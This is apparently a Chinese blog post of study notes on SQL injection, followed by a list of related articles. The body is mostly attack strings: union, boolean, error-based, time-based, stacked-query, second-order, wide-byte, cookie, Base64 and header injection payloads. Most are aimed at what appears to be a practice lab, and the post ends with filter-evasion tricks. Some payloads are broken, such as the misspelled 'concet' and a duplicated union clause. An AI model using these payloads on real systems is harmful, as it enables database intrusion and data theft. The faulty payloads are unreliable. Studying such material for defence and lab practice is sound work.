渗透测试之SQL注入

最新推荐文章于 2025-05-11 11:10:25 发布
最新推荐文章于 2025-05-11 11:10:25 发布
阅读量1.2k 收藏 11
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 渗透 文章标签: SQL注入 Web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42477007/article/details/89639476

SQL注入基础

  1. SQL注入漏洞的产生需要满足以下两个条件:
    参数用户可控:前端传给后端的参数内容是用户可控的; 参数代入数据库查询:传入的参数拼接到SQL语句且带入数据库查询。
  2. 与MySQL注入相关的知识点

在MySQL5.0版本之后,MySQL默认在数据库存放一个" information_schema" 的数据库, 在该库中,我们需要记住三个表名 ,分别是"SCHEMATA、TABLES、COLUMNS"
需要记住的函数:

database():当前网站使用的数据库;
version():当前MySQL版本;
user(): 当前MySQL的用户;

注释符:# 或 --空格 或 /**/

内联注释符: /*! code */
常用注入语句:

union select 1,schema_name from information_schema.schemata                          爆库
union select 1,table_name from information_schema.tables where table_schema='库名'   爆表
union select 1,column_name from information_schema.columns where table_schema='库名' 爆列
union select 1,k0y from thiskey                           查看数据

SQL注入靶场

注入攻击

  1. Union 注入攻击
  #判断是否存在注入
http://43.247.91.228:84/Less-1/?id=1'    #后面直接加单引号,如果报错,可能存在注入
http://43.247.91.228:84/Less-1/?id=1  and 1=1   #返回正常
http://43.247.91.228:84/Less-1/?id=1  and 1=2   #返回错误 可能存在注入

#查询字段数
http://43.247.91.228:84/Less-1/?id=1  order by 1  #返回正常
http://43.247.91.228:84/Less-1/?id=1  order by 2  #返回正常
http://43.247.91.228:84/Less-1/?id=1  order by 3  #返回报错   字段数为2

#查询参数所对应的内容,然后将数据库的内容输出到页面
http://43.247.91.228:84/Less-1/?id=-1 union select 1,2  # 返回数字2
http://43.247.91.228:84/Less-1/?id=-1 union select 1,database()  #查询当前数据库
http://43.247.91.228:84/Less-1/?id=-1 union select 1,union select 1,table_name from information_schema.tables where table_schema='库名'   爆表
http://43.247.91.228:84/Less-1/?id=-1 union select 1,column_name from information_schema.columns where table_schema='库名' 爆列
http://43.247.91.228:84/Less-1/?id=-1 union select 1,k0y from thiskey                     查看字段
  1. Boolean 注入攻击
#判断是否存在注入
http://43.247.91.228:84/Less-5/?id=1'   #返回结果由yes 变成了 no  可能存在注入

#判断数据库的长度
http://43.247.91.228:84/Less-5/?id=1‘ and length(database())>=1--+  #1可以换为任何一个你觉得可能长度的数字
http://43.247.91.228:84/Less-5/?id=1’ and length(database())>=3--+  #返回yes
http://43.247.91.228:84/Less-5/?id=1’ and length(database())>=4--+  #返回 no 判断出数据库长度为3

#判断数据库库名
http://43.247.91.228:84/Less-5/?id=1’ and substr(database(),1,1)='t'--+   #判断第一个字符是否为 't' 是则返回yes
# substr 是截取的意思 't' 可以是任何一个字符 直到返回yes 就证明字符猜对了
http://43.247.91.228:84/Less-5/?id=1’ and substr(database(),2,1)='q'--+   #判断第二个字符是否为 'q' 直到判断出数据库名

#查询表名、字段名 将database() 换为(select table_name from information_schema.tables where table_schema='sql' limit 0,1)

http://43.247.91.228:84/Less-5/?id=1’ and substr((select table_name from information_schema.tables where table_schema='sql' limit 0,1),1,1)='e'--+

#依此类推直到推出所有的表名和字段名
  1. 报错注入攻击
    加 ’ 后报错:数据库语法错误
#获取当前数据库的库名
’ and updatexml(1,concet(0x7e,(select database()),0x7e),1)--+   #0x7e~ASCII编码

#接着继续获取数据库的表名字段名  方法同上,将database() 换为查询语句 并为查询语句加上 ()   
’ and updatexml(1,concet(0x7e,(select table_name from information_schema.tables where table_schema='sql' limit 0,1),0x7e),1)--+

SQL 注入进阶

  1. 时间注入攻击 #Boolean注入的进阶——时间盲注
    它与Boolean注入的不同之处在于,时间注入是利用sleep() 或 benchmark() 等函数让MySQL的执行时间变长。时间盲注多与IF(expr1,expr2,expr3)结合使用 含义是:如果expr1是 TRUE ,则IF()的返回值为expr2;否者返回值为expr3.
if (length(database())>=1,sleep(5),1) #如果数据库库名的长度大于1,则MySQL查询休眠5秒
#其他查询语句 与Boolean注入相似。将database() 替换为查询语句即可查询数据库的表名,列名,字段
  1. 堆叠查询注入攻击
    堆叠查询可以执行多条语句,多语句之间用分号隔开。堆叠查询注入就是利用这个特点,在第二个SQL语句中构造自己要执行的语句。首先访问id=1’ ,页面返回MySQL错误,在访问id=1’%23,页面返回正常结果。这里可以使用Boolean注入、时间注入、也可以用另外一种注入方式——堆叠注入
#注入语句
';select if(substr((database() limit 0,1),1,1)='e',sleep(3),1)%23
  1. 二次注入攻击
    #1.php页面的功能是注册用户名;也是插入SQL语句的地方;2.php页面的功能是通过id参数读取用户名和用户信息
   http://www.xxx.com.er/1.php?username=test 和
   http://www.xxx.com.er/2.php?id=10
   
   #第一步,访问1.php?username=test'
   返回结果是用户名test' 对应的id为21
   #第二步访问2.php?id=21;
   返回结果 报错:error in your SQL syntax
   #第三部 返回第一步访问1.php?username=test' order by 1%23
   返回一个新的id=32
   #第四步  再访问2.php?id=32
   返回空白页面
   
重复第三步第四步(改变order by 字段数,返回id也不同) 直到页面返回错误信息, 从而判断出字段数。
  1. 宽字节注入攻击
访问 id=1' 时 程序并没有报错,反而多了一个注意字符(反斜杠'\\');
当数据库编码为GBK时可以使用宽字节注入;
注入方式: id=1%df'%23          #先加%df再加‘    %23用来注释单引号;
因为反斜杠的编码是%5c,而在GBK编码中,%df%5c 是繁体字 "連";所以这时候单引号成功逃逸,报出MySQL数据库的错误;
接下来就可以用Union 查询,与Union注入一样。
  1. cookie注入攻击
 发现URL中没有GET参数,但是页面返回正常,这时我们使用Burp Suite 抓取数据包,如果发现cookie中存在id=1的参数,则可能存在cookie注入。
 用Burp Suite 修改cookie中的参数id=1 and 1=1   和 id=1 and 1=2,即可判断是否存在cookie注入。
  1. Base64注入攻击
发现id后面的参数经过base64编码,尝试参数后面加上一个单引号并一起转换成Base64编码
访问后页面返回错误 然后将参数改为 1 and 1=1 和 1 and 1=2 并且Base64编码, 查看访问结果; 判断是否存在注入
  1. XFF注入攻击
    XFF即HTTP请求头中的一个头部参数 X-Forwarded-for;它代表客户端真实的IP,通过修改X-Forwarded-for 的值可以伪造客户端IP

SQL 注入绕过

  1. 大小写绕过注入 例如: And aNd Order …

  2. 双写绕过注入 例如: anandd oorrder by…

  3. 编码绕过注入 例如:二次url编码

  4. 内联注释绕过注入 :

    id=1 /*!and*/ 1=1   
id=1 /*!and*/ 1=2
渗透测试sql注入
weixin_45380284的博客
03-05 929
sql注入 理论: 1.sql语言: 结构化查询语言 是一种数据库查询和程序设计语言 用于存取数据及查询、更新、管理关系数据库系统 常用的语句: 增:insert into <表名><列名>values(列值) 删:delete from <表名>( where<删除条件>) 改:update <表名> set <列名=更新值>(where<更新条件>) 查:select <列名>from<表名>(w
渗透测试——SQL注入
zjdda的博客
05-19 829
sql注入原理及实战
Web安全渗透测试基础知识之SQL注入
最新发布
玉笥寻珍的博客
05-11 1354
作为一名信息安全专业的学生,我在学习Web安全渗透测试过程中,对SQL注入进行了深入钻研,将理论知识与实战案例相结合,整理出这份学习笔记。首次发布的内容涵盖SQL注入基础理论、实战操作、常见问题及WAF绕过方法等核心要点。这是我学习笔记系列的开篇之作,后续还会持续更新更多Web安全知识,希望能与大家共同学习、交流进步,也欢迎各位前辈不吝赐教!
渗透测试-SQL注入
weixin_53696027的博客
02-05 2871
sql注入渗透测试重要的一部分,如果服务器存在sql注入漏洞将面临严重的威胁
个人笔记-渗透测试-SQL注入
weixin_48162696的博客
05-20 1179
SQL注入原理,sql注入的数据类型,sql注入的提交方式,手工注入sqlmap,基础防御,
渗透测试SQL注入(简介)
weixin_53958661的博客
12-18 3146
SQL注入简介,什么是SQL注入SQL注入的分类
33-33.渗透测试渗透测试SQL注入基于报错注入(下)
05-10
渗透测试渗透测试SQL注入基于报错注入(下)
29-29.渗透测试SQL注入基础(上)
05-10
渗透测试SQL注入基础(上)
渗透测试sql注入验证安全攻击性能
cc123489ll的博客
04-23 981
🍅文末有免费的配套视频可观看🍅,免费获取软件测试全套资料,资料在手,涨薪更快由于渗透测试牵涉到安全性以及攻击性,为了便于交流分享,本人这里不进行具体网址的透露了。我们可以在网上查找一些公司官方网站。
渗透入侵\超级SQL注入工具 SSQLInjection V1.0.zip
07-15
超级SQL注入工具 SSQLInjection V1.0
渗透测试——五、网站漏洞——SQL注入
热门推荐
钟言的博客
12-05 1万+
本篇为学习渗透测试第五课,网站漏洞即SQL注入,详细内容如下:一、走进DVWA测试网站 1、网站渗透测试步骤 2、DVWA网站 3、其他漏洞网站 4、进入DVMA网站 二、暴力破解和SQL注入 1、暴力破解 2、SQL语句 3、PHP语言 4、暴力破解页面之Burp Suite破解 5、暴力破解页面之SQL注入 6、SQL注入页面之 SQL注入 7、SQL注入(盲注)页面之 SQL注人 8、SQL注入(盲注)页面之SQLMap 自动注入等等
渗透测试SQL注入详解
weixin_50904074的博客
03-09 485
在JAVA、C等强类型语言中一般是不存在数字型注入的,因为在接受到用户输入id时,代码一般会做一个int id 的数据类型转换,假如我们输入的是字符串的话,那么这种情况下,程序就会报错。这里的id是可控的参数,正如我们输入1的时候,数据库执行的语句应为:select *from '参数或字段' where id = 1,但当我们输入1 ' 的时候,数据库的执行语句为select *from '参数或字段' where id = 1 '。sleep(n)会延时显示结果,且延时的时间为 n乘查询到的记录条数。
渗透测试SQL注入之【常规的SQL注入语句】这个渗透测试知识点教会你如何去做一些常规的sql注入
白帽阿叁的博客
04-15 1316
SQL注入攻击漏洞的原因,是由于程序员在编写Web程序时,_没有对客户端(比如浏览器等)提交的参数进行严格的过滤和判断。用户可以修改参数或数据,并传递至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端执行,数据库将sql语句的执行结果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,甚至执行危险的代码或_系统命令。简单来说就是:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作前端页面上所有提交数据的地方。
渗透测试-百日筑基—SQL注入篇&时间注入&绕过&HTTP数据编码&绕过—下
LANDUOSHUREN的博客
10-25 1503
SQL 注入绕过技术 已经是一个老生常谈的内容了,防注入可以使用某些云 waf加速乐等安全产品,这些产品会自带 waf 属性拦截和抵御 SQL 注入,也有一些产品会在服务器里安装软件,例如 iis 安全狗、d 盾、还有就是在程序里对输入参数进行过滤和拦截 例如 360webscan 脚本等只要参数传入的时候就会进行检测,检测到有危害语句就会拦截。但是在日渐成熟的 waf 产品面前,因为 waf 产品的规则越来越完善,所以防御就会越来越高,安全系统也跟着提高,对渗透测试而言,测试的难度就越来越高了。
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
freeking101的博客
07-03 1万+
SQL注入就是将SQL代码插入或添加到 应用或者用户的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器,SQL服务器解析并执行篡改后的sql 并把结果返回。如果管理员没有对参数进行过滤,那么黑客可以通过数据传输点将恶意的SQL语句带入查询。
sqlmap工具:高效渗透测试SQL注入检测
针对SQL注入漏洞的渗透测试,目的是识别并修复可能被攻击者利用进行SQL注入攻击的漏洞。进行SQL注入渗透测试可以有效地发现和加固应用程序的安全性。 #### 3. sqlmap工具介绍 sqlmap是一个开源的自动化SQL注入和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值